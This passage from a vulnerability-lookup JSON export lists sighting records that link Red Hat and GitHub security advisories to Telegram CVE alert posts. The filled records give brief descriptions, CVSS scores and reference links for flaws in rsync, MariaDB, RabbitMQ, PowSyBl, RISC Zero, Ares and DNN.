"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18777", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12088\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. When using the `--safe-links` option, the rsync client fails to properly verify if a symbolic link destination sent from the server contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.\n\ud83d\udccf Published: 2025-01-14T17:38:34.890Z\n\ud83d\udccf Modified: 2025-06-18T16:34:57.892Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12088\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2330676\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-18T16:43:22.000000Z"}, {"uuid": "66c323f8-1253-4c8a-b17e-b494a63e3b8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2600", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18777", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12088\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync. When using the `--safe-links` option, the rsync client fails to properly verify if a symbolic link destination sent from the server contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.\n\ud83d\udccf Published: 2025-01-14T17:38:34.890Z\n\ud83d\udccf Modified: 2025-06-18T16:34:57.892Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2600\n2. https://access.redhat.com/errata/RHSA-2025:7050\n3. https://access.redhat.com/errata/RHSA-2025:8385\n4. https://access.redhat.com/security/cve/CVE-2024-12088\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2330676\n6. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-06-18T16:43:22.000000Z"}, {"uuid": "ca6e78a0-4e25-4037-845c-4f69dbaa74ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:5683", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "2f084f39-3398-43ba-9f78-4cdb10ffea8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXQ7-H93F-9JRG", "type": "seen", "source": "Telegram/LUR06ONloRlViUIW27ojzHZG9BE33b4Dag-_8VffcgXgN_8", "content": "", "creation_timestamp": "2026-04-22T01:19:23.000000Z"}, {"uuid": "388902ca-7e35-44c0-9959-f292a037021a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6822", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "5c866870-ee4a-4724-9312-1c73b6ce487b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:6883", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-5157\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.\n\ud83d\udccf Published: 2023-09-26T13:25:24.082Z\n\ud83d\udccf Modified: 2025-06-18T14:15:05.632Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:5683\n2. https://access.redhat.com/errata/RHSA-2023:5684\n3. https://access.redhat.com/errata/RHSA-2023:6821\n4. https://access.redhat.com/errata/RHSA-2023:6822\n5. https://access.redhat.com/errata/RHSA-2023:6883\n6. https://access.redhat.com/errata/RHSA-2023:7633\n7. https://access.redhat.com/security/cve/CVE-2023-5157\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2240246", "creation_timestamp": "2025-06-18T14:41:57.000000Z"}, {"uuid": "7bc3bfcb-8ddd-455d-8acb-b575df61a7aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GH3X-4X42-FVQ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18869", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50200\n\ud83d\udd25 CVSS Score: 6.7 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: RabbitMQ is a messaging and streaming broker. In versions 3.13.7 and prior, RabbitMQ is logging authorization headers in plaintext encoded in base64. When querying RabbitMQ api with HTTP/s with basic authentication it creates logs with all headers in request, including authorization headers which show base64 encoded username:password. This is easy to decode and afterwards could be used to obtain control to the system depending on credentials. This issue has been patched in version 4.0.8.\n\ud83d\udccf Published: 2025-06-19T16:14:24.919Z\n\ud83d\udccf Modified: 2025-06-19T16:14:24.919Z\n\ud83d\udd17 References:\n1. https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-gh3x-4x42-fvq8", "creation_timestamp": "2025-06-19T16:45:41.000000Z"}, {"uuid": "cc4c06d5-d8d6-4fc3-9da9-d5fd04e28417", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8140", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "0719fcbb-f450-4b6c-9cda-06093104ca4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9179", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "5353002a-66c1-4af9-9042-cdc8e4a12165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8139", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "2738376d-af58-47e4-b974-649a199e16d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8126", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "4cc66d4e-0d98-43c3-bd6d-5a06ea120206", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7505", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "3e16bcb3-19b8-42d0-972c-5e83f9c417a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8481", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "1d5d7381-dba4-4e6c-bed6-7238c14c4362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8252", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "a2bcea73-c1a3-4ddb-9dc2-e56b30bcb83d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8663", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "d4bd9ffe-5966-4fde-9cc7-e3ad8b292f3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QPJ9-QCWX-8JV2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18881", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47293\n\ud83d\udd25 CVSS Score: 2.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: PowSyBl (Power System Blocks) is a framework to build power system oriented software. Prior to version 6.7.2, in certain places, powsybl-core XML parsing is vulnerable to an XML external entity (XXE) attack and to a server-side request forgery (SSRF) attack. This allows an attacker to elevate their privileges to read files that they do not have permissions to, including sensitive files on the system. The vulnerable class is com.powsybl.commons.xml.XmlReader which is considered to be untrusted in use cases where untrusted users can submit their XML to the vulnerable methods. This can be a multi-tenant application that hosts many different users perhaps with different privilege levels. This issue has been patched in com.powsybl:powsybl-commons: 6.7.2.\n\ud83d\udccf Published: 2025-06-19T21:35:40.992Z\n\ud83d\udccf Modified: 2025-06-19T21:35:40.992Z\n\ud83d\udd17 References:\n1. https://github.com/powsybl/powsybl-core/security/advisories/GHSA-qpj9-qcwx-8jv2\n2. https://github.com/powsybl/powsybl-core/commit/e6c7c4997ae8758b54a2f23ce1a499e25113acdc\n3. https://github.com/powsybl/powsybl-core/releases/tag/v6.7.2", "creation_timestamp": "2025-06-19T21:44:47.000000Z"}, {"uuid": "d161540c-d1fe-4f86-a07d-79fadef01790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24C2-GP6C-24C6", "type": "published-proof-of-concept", "source": "Telegram/GpzWIna0u4_Xk2Mx_yx7IImpynDcGXZQ8MHW9U4L55IH_FQ", "content": "", "creation_timestamp": "2026-04-23T15:16:16.000000Z"}, {"uuid": "7c69167d-8075-43a5-87cc-779e37d45bf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19321", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49177\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in the XFIXES extension. The XFixesSetClientDisconnectMode handler does not validate the request length, allowing a client to read unintended memory from previous requests.\n\ud83d\udccf Published: 2025-06-17T14:49:49.199Z\n\ud83d\udccf Modified: 2025-06-24T08:30:11.291Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9304\n2. https://access.redhat.com/security/cve/CVE-2025-49177\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2369955", "creation_timestamp": "2025-06-24T08:50:36.000000Z"}, {"uuid": "dbb5682a-23c0-4cd4-a434-e066acf4142e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8QJW-9XGM-C9FF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19003", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48059\n\ud83d\udd25 CVSS Score: 2.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: PowSyBl (Power System Blocks) is a framework to build power system oriented software. In com.powsybl:powsybl-iidm-criteria versions 6.3.0 to before 6.7.2 and com.powsybl:powsybl-contingency-api versions 5.0.0 to before 6.3.0, there is a a potential polynomial Regular Expression Denial of Service (ReDoS) vulnerability in the RegexCriterion class. This class compiles and evaluates an unvalidated, user-supplied regular expression against the identifier of an Identifiable object via Pattern.compile(regex).matcher(id).find(). If successfully exploited, a malicious actor can cause significant CPU exhaustion through repeated or recursive filter(...) calls \u2014 especially if performed over large network models or filtering operations. This issue has been patched in com.powsybl:powsybl-iidm-criteria 6.7.2.\n\ud83d\udccf Published: 2025-06-20T16:50:35.974Z\n\ud83d\udccf Modified: 2025-06-20T17:37:30.252Z\n\ud83d\udd17 References:\n1. https://github.com/powsybl/powsybl-core/security/advisories/GHSA-8qjw-9xgm-c9ff\n2. https://github.com/powsybl/powsybl-core/commit/d8398f689a5ccd505bd62eee2bd6670a29133110\n3. https://github.com/powsybl/powsybl-core/releases/tag/v6.7.2", "creation_timestamp": "2025-06-20T17:46:18.000000Z"}, {"uuid": "657d8d15-ecfa-4807-98a5-9680d6204b5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3QG-6746-3MG9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19015", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52484\n\ud83d\udd25 CVSS Score: 2.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: RISC Zero is a general computing platform based on zk-STARKs and the RISC-V microarchitecture. Due to a missing constraint in the rv32im circuit, any 3-register RISC-V instruction (including remu and divu) in risc0-zkvm 2.0.0, 2.0.1, and 2.0.2 are vulnerable to an attack by a malicious prover. The main idea for the attack is to confuse the RISC-V virtual machine into treating the value of the rs1 register as the same as the rs2 register due to a lack of constraints in the rv32im circuit. Rust applications using the risc0-zkvm crate at versions 2.0.0, 2.0.1, and 2.0.2 should upgrade to version 2.1.0. Smart contract applications using the official RISC Zero Verifier Router do not need to take any action: zkVM version 2.1 is active on all official routers, and version 2.0 has been disabled. Smart contract applications not using the verifier router should update their contracts to send verification calls to the 2.1 version of the verifier.\n\ud83d\udccf Published: 2025-06-20T17:21:28.392Z\n\ud83d\udccf Modified: 2025-06-20T17:21:28.392Z\n\ud83d\udd17 References:\n1. https://github.com/risc0/risc0/security/advisories/GHSA-g3qg-6746-3mg9\n2. https://github.com/risc0/risc0/pull/3181\n3. https://github.com/risc0/zirgen/pull/238\n4. https://github.com/risc0/risc0/commit/006d86c363b16d2b2ac42d32d832a209ff8ab4c9\n5. https://github.com/risc0/risc0/commit/1873bbb8a56793edd1f6195242d184cf6cc5175d\n6. https://github.com/risc0/risc0/commit/67f2d81c638bff5f4fcfe11a084ebb34799b7a89\n7. https://github.com/risc0/zirgen/commit/e0e2918302c93e956f73ca2e44aef2b861d8c3ae", "creation_timestamp": "2025-06-20T17:46:35.000000Z"}, {"uuid": "f3eedc2d-555a-42fb-add3-0b104be55d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3HJ-WR2Q-X83G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19026", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23688\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.\n\n\n\ud83d\udccf Published: 2024-01-19T21:26:35.282Z\n\ud83d\udccf Modified: 2025-06-20T18:28:31.476Z\n\ud83d\udd17 References:\n1. https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g\n2. https://github.com/advisories/GHSA-w3hj-wr2q-x83g\n3. https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g", "creation_timestamp": "2025-06-20T18:42:20.000000Z"}, {"uuid": "a84645a3-8642-4821-99a9-1add69fd689f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-883X-6FCH-6WJX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19028", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23683\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.\n\n\n\n\n\n\n\ud83d\udccf Published: 2024-01-19T20:48:42.271Z\n\ud83d\udccf Modified: 2025-06-20T18:26:59.260Z\n\ud83d\udd17 References:\n1. https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx\n2. https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371\n3. https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392\n4. https://github.com/ls1intum/Ares/releases/tag/1.7.6\n5. https://github.com/advisories/GHSA-883x-6fch-6wjx\n6. https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx", "creation_timestamp": "2025-06-20T18:42:22.000000Z"}, {"uuid": "150af7e4-3e48-450e-acd3-2fa761346c3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78MF-482W-62QJ", "type": "seen", "source": "Telegram/y1XO5mBm2flLcrjS5YpFLtlumq47M984z8tJCHS_wnxFgvg", "content": "", "creation_timestamp": "2026-04-22T19:23:16.000000Z"}, {"uuid": "774a7409-12f4-4859-b22b-03045283f04f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CWG-9F6J-9JVX", "type": "seen", "source": "Telegram/y1XO5mBm2flLcrjS5YpFLtlumq47M984z8tJCHS_wnxFgvg", "content": "", "creation_timestamp": "2026-04-22T19:23:16.000000Z"}, {"uuid": "a7fd80d2-c28b-4146-b88e-86cc001ae4a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ2W-WFGV-MWQ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19027", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23684\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.\n\n\n\ud83d\udccf Published: 2024-01-19T20:59:02.723Z\n\ud83d\udccf Modified: 2025-06-20T18:27:45.342Z\n\ud83d\udd17 References:\n1. https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6\n2. https://github.com/advisories/GHSA-fj2w-wfgv-mwq6\n3. https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6", "creation_timestamp": "2025-06-20T18:42:21.000000Z"}, {"uuid": "1b63a8fb-3d25-48ee-a924-0ce0a5ff61d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-227W-WV4J-67H4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19029", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-23682\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.\n\n\n\n\ud83d\udccf Published: 2024-01-19T20:13:55.453Z\n\ud83d\udccf Modified: 2025-06-20T18:25:03.328Z\n\ud83d\udd17 References:\n1. https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4\n2. https://github.com/ls1intum/Ares/issues/15\n3. https://github.com/ls1intum/Ares/releases/tag/1.8.0\n4. https://github.com/advisories/GHSA-227w-wv4j-67h4\n5. https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4", "creation_timestamp": "2025-06-20T18:42:23.000000Z"}, {"uuid": "24799250-b0f1-41f7-b9e0-9845e41cf6bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2QJ-PRGH-4G9R", "type": "published-proof-of-concept", "source": "Telegram/wn9Qi4rYZ0wmwM_3QnYEzwEWgvyumLNiA44jY2rXcciEdxg", "content": "", "creation_timestamp": "2026-04-22T21:20:09.000000Z"}, {"uuid": "918a6637-6185-4b37-b9fc-016238e9d41c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8482", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "712174a6-dc3c-4448-afc5-7036aa6bdc5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJHG-3MRH-MM7H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19103", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52487\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 7.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted request or proxy to be created that could bypass the design of DNN Login IP Filters allowing login attempts from IP Addresses not in the allow list. This issue has been patched in version 10.0.1.\n\ud83d\udccf Published: 2025-06-21T02:44:58.636Z\n\ud83d\udccf Modified: 2025-06-21T02:44:58.636Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-fjhg-3mrh-mm7h", "creation_timestamp": "2025-06-21T03:45:47.000000Z"}, {"uuid": "c2b8a2b9-fcde-4513-9261-45f7052ac586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8132", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "3c5d8667-2127-4e82-8e6e-13efc4e00e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:8480", "type": "seen", "source": "Telegram/YPnShX-Sf1dcZiYy4mQ8RUtY6bJ9zloml3KU4dFfq-qF8yY", "content": "", "creation_timestamp": "2026-04-22T13:15:32.000000Z"}, {"uuid": "45904cd3-1d6e-4602-a7c4-69dc63da2d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9304", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19182", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49179\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: A flaw was found in the X Record extension. The RecordSanityCheckRegisterClients function does not check for an integer overflow when computing request length, which allows a client to bypass length checks.\n\ud83d\udccf Published: 2025-06-17T14:54:49.288Z\n\ud83d\udccf Modified: 2025-06-23T06:34:29.129Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:9303\n2. https://access.redhat.com/errata/RHSA-2025:9304\n3. https://access.redhat.com/errata/RHSA-2025:9305\n4. https://access.redhat.com/errata/RHSA-2025:9306\n5. https://access.redhat.com/security/cve/CVE-2025-49179\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2369978", 